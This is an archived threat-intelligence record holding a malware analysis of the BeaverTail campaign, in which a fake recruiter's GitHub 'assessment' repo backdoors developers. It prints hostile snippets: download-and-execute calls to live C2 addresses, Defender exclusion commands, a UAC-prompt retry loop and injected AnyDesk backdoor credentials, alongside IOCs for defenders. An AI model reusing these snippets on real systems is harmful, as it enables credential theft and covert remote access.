{
	"id": "df8fa633-cea8-4e89-8f01-99527e862bfd",
	"created_at": "2026-04-06T00:19:03.407088Z",
	"updated_at": "2026-04-10T13:12:58.779563Z",
	"deleted_at": null,
	"sha1_hash": "bb2fe7b3be077c56cf0d7b7df0b3583d5976734a",
	"title": "How a fake AI recruiter delivers five staged malware disguised as a dream job",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 13453564,
	"plain_text": "How a fake AI recruiter delivers five staged malware disguised as a\r\ndream job\r\nBy Shantanu\r\nPublished: 2025-10-20 · Archived: 2026-04-05 22:00:35 UTC\r\nFeatured\r\n14 min read\r\nOct 20, 2025\r\nOverview\r\nIt starts like every developer’s favourite notification:\r\n“You’ve been shortlisted for an AI engineering role.”\r\nThe company looks exciting - DLMind, an “AI-driven innovation lab.” The recruiter seems legit - Tim Morenc,\r\nCEDS, with a polished LinkedIn profile, professional tone, and a history of mutual connections.\r\nBut behind that friendly message lies BeaverTail - a malicious campaign engineered to hijack your curiosity, your\r\ncode, and your credentials.\r\nThe Hook\r\nDevelopers receive LinkedIn messages offering a lucrative remote position titled “Innovative AI Engineer.” The\r\nattacker, posing as Tim Morenc, invites them to collaborate on a private GitHub repository supposedly\r\ncontaining a coding assessment. The instructions are simple:\r\n“Clone the repo, review the code, run the setup, and share your feedback.”\r\nAnd that’s exactly what triggers the trap.\r\nThe Bite\r\nThe moment the provided script executes, it unfurls a five-staged payload - a meticulously crafted attack chain\r\ndesigned to blend into a developer’s workflow.\r\nThe malware silently:\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 1 of 23\n\nScans .env and configuration files for API keys, tokens, and wallet credentials\r\nSteals saved browser logins and cookies\r\nHijacks the clipboard\r\nCollects system fingerprints and local file inventories\r\nDeploys persistent backdoors using WebSocket beacons and AnyDesk for remote control\r\nBy the time the “assessment” finishes running, the attacker already owns the victim’s digital life.\r\nThe Setup\r\nFake Company: DLMind (dlmind-tech)\r\nAttacker Persona: Tim Morenc, CEDS - “AI Recruitment Lead”\r\nBait Role: Innovative AI Engineer\r\nGitHub Repo: github.com/dlmind-tech/AI-Healthcare\r\nObjective: Credential theft, crypto hijacking, and persistent access\r\nBeaverTail doesn’t just phish - it weaponises trust, blending social engineering with technical precision. In a\r\nworld where GitHub pull requests and LinkedIn job offers blur the line between opportunity and exploitation,\r\nBeaverTail reminds us that sometimes the most dangerous code review is the one you didn’t expect.\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 2 of 23\n\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 3 of 23\n\nPress enter or click to view image in full size\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 4 of 23\n\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 5 of 23\n\nInitial Access: The Technical Assessment\r\nTim Morenc CEDS contacts developers on LinkedIn about AI engineering positions at DLMind. Instead of a\r\ntypical coding interview, candidates receive a “technical assessment”:\r\n“Please review this codebase and share your technical thoughts. It’s one of our AI-powered healthcare products.”\r\nGithub Repository: https://github.com/dlmind-tech/AI-Healthcare\r\nPress enter or click to view image in full size\r\nGithub Org\r\nPress enter or click to view image in full size\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 6 of 23\n\nReadme.md\r\nThe repository appears to be a Next.js application called “MEDIRA” —an AI-powered healthcare platform with\r\nthe following features:\r\nMongoDB Integration: Secure storage for medical data\r\nMedical Assistant: Get AI-powered medical assessments based on symptoms\r\nGoogle Gemini Integration: Advanced language model for accurate medical advice\r\nTo review the code and see it in action, the developer will naturally run:\r\ngit clone hxxps://github[.]com/dlmind-tech/AI-Healthcare.git\r\ncd AI-Healthcare\r\nnpm install\r\nnode run dev/build\r\nStage 0: The Backdoor\r\nWe have a large project with numerous directories and files, designed to be an AI-powered healthcare platform\r\nwith a wide range of features.\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 7 of 23\n\nCode Directory Structure\r\nWithin this project, there are two files that contain a backdoor mechanism. The backdoor is extremely well-hidden\r\nand is difficult to detect unless you are specifically searching for it.\r\nFile 1: auth/config/index.js (Line 98)\r\nEncoded C2 URL\r\nThis file contains the actual C2 URL where the 1st stage payload is present. It base64 decodes to\r\nloopsoft[.]tech:6168/defy/v8\r\nFile 2: auth/routes/cities.js (Lines 36–58)\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 8 of 23\n\nFunction to download and execute next payload\r\nThis is the function used for calling the payload from the C2 URL that it gets from the above base64, after\r\ndecoding it.\r\nHow It Works:\r\nThe backdoor executes automatically when node auth/server.js runs\r\nCalls loopsoft[.]tech:6168/defy/v8 on server startup\r\nThe C2 server deliberately returns an HTTP error 404 with the malicious JavaScript code embedded in the\r\ntoken field of the JSON response body.\r\nThe JavaScript payload in the error response gets executed with full Node.js privileges\r\nThis delivers the Stage 1 infostealer (4k+ lines of obfuscated JavaScript)\r\nPress enter or click to view image in full size\r\nC2 response with 404 status and malicious js in body\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 9 of 23\n\nStage 1: JavaScript InfoStealer\r\nThis is a nasty piece of heavily obfuscated malware that acts as an information stealer and also sets up persistent\r\nremote access. And not so surprisingly, it’s cross-platform. So it works well with Windows, Linux, and macOS.\r\nSerious efforts went into the development, with a lot of evasion techniques and comprehensive data theft\r\ncapabilities.\r\nHow it works\r\nThe raw JavaScript from the C2 server underwent multi-stage deobfuscation. The initial pass with a public\r\nJavaScript deobfuscator (https://deobfuscate.relative.im) successfully unpacked control flow obfuscation and\r\nrevealed the malware’s core components, including infostealer functions, file system operations, and network\r\nupload mechanisms. However, this addressed only the first layer; the remaining code used a custom Base91-based\r\nobfuscation scheme.\r\nPress enter or click to view image in full size\r\nPartially Deobfuscated JS\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 10 of 23\n\nThis obfuscation relied on a modified Base91 encoding with a twist: instead of a single decoding alphabet, the\r\nmalware used multiple unique character sets to encode different strings. This required identifying which alphabet\r\ncorresponded to each string, rather than using a single decoder. The key to decoding was recognising repeated\r\npatterns — such as alphabet strings followed by lookup functions (.indexOf(), .charAt(), or array access) — and\r\nspotting encoded string groups with similar lengths, distributions, and array storage patterns.\r\nFinal approach to decoding was:\r\nIdentify Targets: Manually define the exact start and end line numbers of code blocks known to contain\r\nencoded strings.\r\nExtract Decoding Keys: Scan the entire script using a specific pattern (‘…’ .indexOf() to find all possible\r\n91-character “alphabets” used for decoding.\r\nExtract Encoded Data: Isolate the code blocks defined in Step 1 and pull out all single-quoted strings,\r\nfiltering out the alphabet found in Step 2.\r\nDecode via Competition: For each piece of encoded data, attempt to decode it with every alphabet.\r\nScore the Results: Evaluate each decoded attempt using a heuristic scoring system. The system rewards\r\ncharacteristics of legitimate code (like keywords, URLs, and printable characters) and penalises gibberish.\r\nSelect the Winner: For each encoded string, the decoded version with the highest score is declared the\r\ncorrect one.\r\nGenerate a Report: Save all the successful encoded-to-decoded mappings into a structured JSON file for review\r\nand further use.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 11 of 23\n\nDecoded Strings\r\nThis worked nicely, and we were now able to piece together everything, which revealed more malware capabilities\r\nand an additional C2 infrastructure that was used for persistent access relying on WebSocket.\r\nC2 Infrastructure: The encoded data contained the complete WebSocket server configuration - address broken\r\ninto octets, port numbers, and unique identifiers. We could now see connections to 172[.]86[.]89[.]10:4382 that\r\nweren’t obvious in the partially-decoded code.\r\nBackdoor implementation: What looked like generic network code was actually a full Socket.IO backdoor with\r\nremote command execution, process disguising (“Node.js Javascript Runtime”), and PID locking to prevent\r\nmultiple instances.\r\nSurveillance capabilities: The decoded strings contained the clipboard monitoring implementation (polling every\r\n500ms with platform-specific commands), the keylogger setup with screenshot correlation, and the file scanner\r\nwith 35 search patterns targeting crypto-related files.\r\nVM detection: Complete evasion logic for Windows (wmic computersystem), macOS (system_profiler), and\r\nLinux (/proc/cpuinfo) to detect VMware, VirtualBox, QEMU, and other analysis environments.\r\nPython payload delivery chain: The decoded strings showed how it downloads an embedded Python runtime,\r\ninstalls it silently, and uses it to execute the next-stage downloader. Without breaking this encoding, we’d have\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 12 of 23\n\nseen a credential stealer targeting browsers and wallets. With the decoded strings, we discovered a multi-stage\r\nattack platform with real-time surveillance, remote access, anti-analysis features, and automated Python malware\r\ndeployment. The multi-alphabet obfuscation wasn’t just slowing analysis - it was hiding the malware’s true\r\nsophistication.\r\nWhat It Does\r\n1. Data Theft:\r\n24 crypto wallets (MetaMask, Phantom, Coinbase, Binance Chain, TronLink, Keplr, Ronin, +17 more)\r\nacross Chrome, Brave, Edge, Opera, Firefox — up to 200 profiles per browser\r\nBrowser credentials - passwords, encryption keys, session tokens\r\nmacOS Keychain - complete credential database (~/Library/Keychains/login.keychain-db)\r\nSensitive files — 35 search patterns: *.env, *mnemonic*, *wallet*, *secret*, crypto configs, documents.\r\nWindows: scans ALL drives\r\n2. Surveillance:\r\nKeylogger (global capture)\r\nClipboard monitoring (500ms polling)\r\nScreenshots (every 3 seconds after keystrokes)\r\n3. System Profiling:\r\nReports to 172[.]86[.]89[.]10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e\r\nSends: OS type, platform, hostname, user info, VM detection status\r\n4. Remote Access:\r\nWebSocket persistent backdoor (172[.]86[.]89[.]10:4382) with Socket.IO\r\nProcess disguised as “Node.js JavaScript Runtime”\r\n5. Data Exfiltration:\r\nStolen credentials/wallets → 88[.]218[.]0[.]78:1224/uploads (POST, multipart/form-data)\r\nFile scanner results → 172[.]86[.]89[.]10:4382/upload (screenshots, keylog data, scanned files)\r\nClipboard data → 172[.]86[.]89[.]10:4382/api/service/makelog (every 500ms)\r\nPython Payload Deployment\r\nAfter stealing data, the malware automatically deploys the next stage - a Python-based downloader that brings in\r\nadditional malware components.\r\nfetch('http://88[.]218[.]0[.]78:1224/pdown')\r\n.then(response =\u003e response.arrayBuffer())\r\n.then(data =\u003e {\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 13 of 23\n\nfs.writeFileSync(tmpDir + '\\\\p.zi', data)\r\nfs.renameSync(tmpDir + '\\\\p.zi', tmpDir + '\\\\p5.zip')\r\nexec('tar -xf \"' + tmpDir + '\\\\p5.zip' + '\" -C \"' + homeDir + '\"')\r\n})\r\nThe config API (api[.]npoint[.]io/96979650f5739bcbaebb) returns {“name”: “winrar”}, which tells the malware to\r\nextract Python to C:\\Users\\{user}\\winrar\\python.exe.\r\nGet Shantanu’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nDownloads Stage 2 Python Script\r\n/ Download heavily obfuscated Python downloader\r\nrequest.get('http://88[.]218[.]0[.]78:1224/client/3/603', (err, res, body) =\u003e {\r\nfs.writeFileSync(homeDir + '/.nlq', body)\r\nexec('\"' + homeDir + '\\\\winrar\\\\python.exe\" \"' + homeDir + '/.nlq\"')\r\nexec('python3 \"' + homeDir + '/.nlq\"')\r\n})\r\nExecution flow: Stage 1 JS → downloads Python runtime → downloads .nlq → executes .nlq\r\nStage 2: Python Downloader\r\nFile: ~/.nlq\r\nThis .nlq is an obfuscated Python file wrapped in 64 layers of reverse→base64→zlib encoding. After decoding it,\r\nwe get the following piece of code:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 14 of 23\n\nPython code of .nlq\r\nThe script first ensures it has the necessary dependencies - if the `requests` library isn’t available, it auto-installs it\r\nusing pip. Then it reaches out to the same C2 server (`88[.]218[.]0[.]78:1224`) that delivered the JavaScript\r\npayload, but this time hitting different endpoints to fetch Python-based malware.\r\nWhat It Does\r\nMake sure the request library is installed\r\nDownloads the code and saves it to a hidden directory and executes it\r\nhxxp://88[.]218[.]0[.]78:1224/payload/3/603 → ~/.n2/way\r\nhxxp://88[.]218[.]0[.]78:1224/brow/3/603 → ~/.n2/pow\r\nPlatform Behaviour:\r\nWindows/Linux: Executes both payloads\r\nmacOS: Exits after first payload (if ot==”Darwin”: sys.exit(-1))\r\nStage 3A: Python RAT (64 Layers)\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 15 of 23\n\nFile: ~/.n2/way\r\nC2 Socket: 88[.]218[.]0[.]78:2243\r\nThe ~/.n2/way file is a Python Remote Access Trojan wrapped in 64 layers of the same reverse→base64→zlib\r\nobfuscation. Once decoded and executed, it provides the attacker with an 8-command toolkit for complete system\r\ncontrol, data exfiltration, and deployment of additional malware stages.\r\nHow it works\r\nAfter decoding, the RAT first profiles the victim system — gathering hostname, IP address, geolocation data (via\r\nip-api[.]com), and a unique identifier derived from the MAC address and username. This registration data is sent\r\nto 88[.]218[.]0[.]78:1224/keys, allowing the attacker to track and organise victims. The RAT then establishes a\r\npersistent TCP socket connection to 88[.]218[.]0[.]78:2243 and waits for commands.\r\nOn Windows systems, the RAT also includes a keylogger component using pyWinhook, pyperclip, and pythoncom\r\nlibraries. It captures all keystrokes with window context, mouse clicks, clipboard activity (with Ctrl+C/V\r\nmarkers), and active window information (process name, PID, timestamp). This data accumulates in a global\r\nbuffer until the attacker requests export via Command 3.\r\nWhat It Does\r\nThe RAT provides 8 sophisticated commands for the following actions:\r\nCommand || Function || Description\r\n1 || ssh_obj || Remote shell + directory navigation\r\n2 || ssh_cmd || Kill all Python processes (self-destruct)\r\n3 || ssh_clip || Export keylogger buffer (Windows only)\r\n4 || ssh_run || Download/execute /brow/3/603 -\u003e ~/.n2/bow\r\n5 || ssh_upload || Upload files/directories/patterns\r\n6 || ssh_kill || Terminate Chrome \u0026 Brave browsers\r\n7 || ssh_any || Download AnyDesk hijacker -\u003e ~/.n2/adc\r\n8 || ssh_env || Scan C: through G: drives for .env files\r\nSystem Registration with C2:\r\n# Sent to hxxp:\r\n{\r\n 'uuid': sha256(MAC_ADDRESS + USERNAME),\r\n 'hostname': '603_' + os.hostname(),\r\n 'internalIp': LOCAL_IP,\r\n 'query': EXTERNAL_IP, # via ip-api.com\r\n 'country': COUNTRY, # via ip-api.com\r\n 'city': CITY, # via ip-api.com\r\n 'lat': LATITUDE, 'lon': LONGITUDE\r\n}\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 16 of 23\n\nKey Capabilities:\r\nRemote shell access — Full command execution with output\r\nKeylogger export — Windows-specific keystroke capture with window context\r\nTargeted file theft — Hunts for .env files across all Windows drives (C: through G:)\r\nBrowser disruption — Kills Chrome/Brave to clear memory artefacts\r\nStage 4 deployment — Downloads AnyDesk hijacker via Command 7\r\nC2 Communication:\r\nRegistration: 88[.]218[.]0[.]78:1224/keys (HTTP POST)\r\nCommand channel: 88[.]218[.]0[.]78:2243 (TCP socket)\r\nStage 3B: Tsunami Persistence\r\nThe ~/.n2/pow file is the persistence framework, wrapped in 128 layers of reverse→base64→zlib obfuscation —\r\ntwice the depth of the RAT. This runs only on Windows and Linux (exits immediately on macOS). Its sole\r\npurpose: ensure the malware survives reboots, security scans, and user cleanup attempts.\r\nHow it works\r\nThe persistence mechanism is multi-layered and aggressive. First, it checks if Python is installed, and if not,\r\ndownloads Python 3.11.0 from either the official Python [.]org site or one of 100+ encrypted fallback mirror URLs\r\n(encoded with Hex→XOR→Base64→Reverse using key !!!HappyPenguin1950!!!). It then installs the\r\ncryptography library and writes a startup injector to the Windows Startup folder.\r\nOn next boot, the injector checks if a scheduled task already exists. If not, it extracts and executes the main\r\npayload, which creates a scheduled task named “Runtime Broker” (mimicking a legitimate Windows process),\r\nadds Windows Defender exclusions, and starts an infinite UAC bypass loop that shows privilege escalation\r\nprompts every 10–20 minutes until the user accepts.\r\nWhat It Does\r\nTriple Persistence:\r\n1. Startup Folder — %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Windows Update\r\nScript.pyw\r\nWindowless Python script (.pyw extension = no console window)\r\n50-layer obfuscated\r\nRuns automatically at user logon\r\n2. Scheduled Task — “Runtime Broker” (mimics legitimate Windows process)\r\nExecutes: %APPDATA%\\Microsoft\\Windows\\Applications\\Runtime Broker.exe\r\nTrigger: At logon\r\nPrivileges: Highest\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 17 of 23\n\n3. Hidden Executable — Runtime Broker.exe with a hidden file attribute\r\nWindows Defender Bypass:\r\nAdd-MpPreference -ExclusionPath '%APPDATA%\\...\\Runtime Broker.exe'\r\nAdd-MpPreference -ExclusionPath '%LOCALAPPDATA%\\...\\msedge.exe' # XMRig miner\r\nUAC Bypass (Infinite Retry):\r\nwhile True:\r\n time.sleep(random.uniform(600, 1200))\r\n if execute_payload_with_uac():\r\n break\r\n \r\nThe UAC prompt appears every 10–20 minutes until the victim clicks “Yes,” giving the malware administrative\r\nprivileges. Most users eventually accept the prompt simply to make the pop-ups stop.\r\nPython Auto-Installation:\r\nPrimary source: python[.]org/ftp/python/3.11.0/python-3.11.0-amd64.exe\r\nFallback: 100+ encrypted mirror URLs\r\nSilent install: /quiet InstallAllUsers=1 PrependPath=1\r\nThis ensures the malware can run even on systems without Python, making it completely self-sufficient.\r\nStage 4: AnyDesk Hijacker\r\nThe final stage is a Python script (~/.n2/adc) deployed via RAT Command 7. Unlike the earlier stages, this one has\r\nno obfuscation. By Stage 4, they’ve already harvested credentials, established remote access, and secured\r\npersistence. Now they’re adding a GUI remote desktop backdoor using legitimate software.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 18 of 23\n\nAnydesk Hijacker Code\r\nHow it works\r\nThe script first checks if AnyDesk is installed. If not, it downloads the official installer from a dedicated\r\noperational server (95[.]164[.]17[.]24:1224/any). It then locates the AnyDesk configuration file (service.conf in\r\n%APPDATA%\\anydesk\\ on Windows or ~/.anydesk/ on Linux) and injects hardcoded backdoor credentials: a\r\npassword hash, password salt, and token salt.\r\nAfter injecting the credentials, the script uploads the modified config to 95[.]164[.]17[.]24:1224/keys for the\r\nattacker’s records, kills the AnyDesk process, restarts it (which loads the backdoored config), and then deletes\r\nitself. The result is a persistent GUI remote access channel that looks completely legitimate to security software\r\nand users.\r\nWhat It Does\r\nAnyDesk Hijacking Process:\r\n1. Installation check — Downloads AnyDesk from 95[.]164[.]17[.]24:1224/any if missing\r\n2. Config injection — Modifies service.conf with backdoor credentials\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 19 of 23\n\n3. Config exfiltration — Uploads modified config to 95[.]164[.]17[.]24:1224/keys\r\n4. Service restart — Kills and restarts AnyDesk to load backdoored config\r\n5. Self-deletion — Removes the hijacker script (no artefacts)\r\nInjected Credentials:\r\nad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d\r\nad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345\r\nad.anynet.token_salt=e43673a2a77ed68fa6e8074167350f8f\r\nConfig File Locations:\r\nWindows: %APPDATA%\\anydesk\\service.conf\r\nLinux: ~/.anydesk/service.conf\r\nThe beauty of this approach from an attacker’s perspective is that AnyDesk is legitimate remote desktop software\r\nused by millions of IT professionals. Security tools won’t flag it, and even if a user notices AnyDesk running, they\r\nmight assume it’s legitimate IT support software. The attacker now has full GUI access — they can see the screen,\r\nmove the mouse, and interact with the system as if they were sitting at the keyboard.\r\nC2 Server: 95[.]164[.]17[.]24:1224 (dedicated AnyDesk operations server, separate from the other C2s)\r\nAttack Chain Overview\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 20 of 23\n\nMalware Execution Flow\r\nIndicators of Compromise (IOCs)\r\nC2 URLs and File Drops\r\nComplete URL || Purpose\r\nhxxp://loopsoft[.]tech:6168/defy/v8 || Stage 0: Delivers Stage\r\nhxxp://88[.]218[.]0[.]78:1224/uploads || Stage 1: Exfiltrates st\r\nhxxp://88[.]218[.]0[.]78:1224/pdown || Stage 1: Downloads Pyth\r\nhxxp://88[.]218[.]0[.]78:1224/client/3/603 || Stage 1: Downloads Stag\r\nhxxp://172[.]86[.]89[.]10:4382/ || Stage 1: WebSocket back\r\nhxxp://172[.]86[.]89[.]10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e || Stage 1: Proce\r\nhxxp://172[.]86[.]89[.]10:4382/api/service/makelog || Stage 1: Keylogger data\r\nhxxp://172[.]86[.]89[.]10:4382/upload || Stage 1: Screenshot/fil\r\nhxxp://88[.]218[.]0[.]78:1224/payload/3/603 || Stage 2: Downloads Pyth\r\nhxxp://88[.]218[.]0[.]78:1224/brow/3/603 || Stage 2: Downloads pers\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 21 of 23\n\nhxxp://88[.]218[.]0[.]78:1224/keys || Stage 3: RAT registrati\r\nhxxp://88[.]218[.]0[.]78:2243/ || Stage 3: Socket.IO RAT\r\nhxxp://88[.]218[.]0[.]78:1224/adc/3 || Stage 3: Downloads AnyD\r\nhxxp://95[.]164[.]17[.]24:1224/any || Stage 4: Downloads AnyD\r\nhxxp://95[.]164[.]17[.]24:1224/keys || Stage 4: Uploads hijack\r\nUnique Domains\r\nloopsoft[.]tech\r\napi[.]npoint[.]io\r\nip-api[.]com\r\nUnique IP Addresses\r\n88[.]218[.]0[.]78 # Primary C2 (ports 1224, 2243)\r\n172[.]86[.]89[.]10 # WebSocket C2 (port 4382)\r\n95[.]164[.]17[.]24 # AnyDesk operations (port 1224)\r\nCritical File Paths\r\nPath || Purpose\r\n~/.nlq || Stage 2 downloader (64 layers\r\n~/.n2/way || Stage 3A RAT (64 layers)\r\n~/.n2/pow || Stage 3B persistence (128 laye\r\n~/.n2/adc || Stage 4 AnyDesk hijacker\r\n~/.n3/ || File scanner staging\r\n%TEMP%\\cc.pid || WebSocket backdoor PID lock (W\r\n/tmp/cc.pid || WebSocket backdoor PID lock (L\r\n$TMPDIR/cc.pid || WebSocket backdoor PID lock (m\r\n%TEMP%\\up.pid || File scanner PID lock (Windows\r\n/tmp/up.pid || File scanner PID lock (Linux/m\r\n%TEMP%\\windows cache\\ || Keylogger cache directory (Win\r\n/tmp/windows cache/ || Keylogger cache (Linux/macOS,\r\n%TEMP%\\windows cache\\1.tmp || Keylog fallback storage\r\n%TEMP%\\windows cache\\2.jpeg || Screenshot temporary storage\r\n%TEMP%\\p.zi || Python runtime download temp f\r\n%TEMP%\\p5.zip || Python runtime ZIP before ext\r\n%APPDATA%\\...\\Startup\\Windows Update Script.pyw || Persistence\r\nFile Hashes (SHA-256)\r\nNote: Hashes represent the obfuscated payloads as delivered by C2 servers and written to disk.\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 22 of 23\n\nOn-Disk Path | Sha256\r\n--------------------|-----------------------------------------------------------------\r\n~/.nlq | b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58\r\n~/.n2/way | 9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160\r\n~/.n2/pow | 006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f\r\n~/.n2/adc | ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e\r\n%TEMP%\\p5.zip | 99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342\r\nDetection Signatures\r\nAnyDesk Backdoor Credentials:\r\nad.anynet.pwd_hash=967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d\r\nad.anynet.pwd_salt=351535afd2d98b9a3a0e14905a60a345\r\nad.anynet.token_salt=e43673a2a77ed68fa6e8074167350f8f\r\nProcess Indicators:\r\nProcess title: “Node.js JavaScript Runtime”\r\nPython from hidden dirs: python ~/.n2/way, pythonw.exe “%APPDATA%\\…\\Runtime Broker.exe”\r\nScheduled task: “Runtime Broker”\r\nConclusion\r\nBeaverTail demonstrates how sophisticated malware campaigns exploit trust in professional platforms and\r\nstandard development workflows. A simple “review this code” request from what appears to be a legitimate\r\nrecruiter leads to complete system compromise in under 15 seconds. The extraction of such secrets means that one\r\ncompromised computer can lead to many more breaches, depending on what access the victim has and can\r\nultimately threaten the company’s security.\r\nIf you received a message from “Tim Morenc CEDS” or were asked to review code from dlmind-tech, your system\r\nmay be compromised.\r\nSource: https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nhttps://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/deriv-tech/how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263"
	],
	"report_names": [
		"how-a-fake-ai-recruiter-delivers-five-staged-malware-disguised-as-a-dream-job-64cc68fec263"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434743,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.pdf",
		"text": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.txt",
		"img": "https://archive.orkl.eu/bb2fe7b3be077c56cf0d7b7df0b3583d5976734a.jpg"
	}
}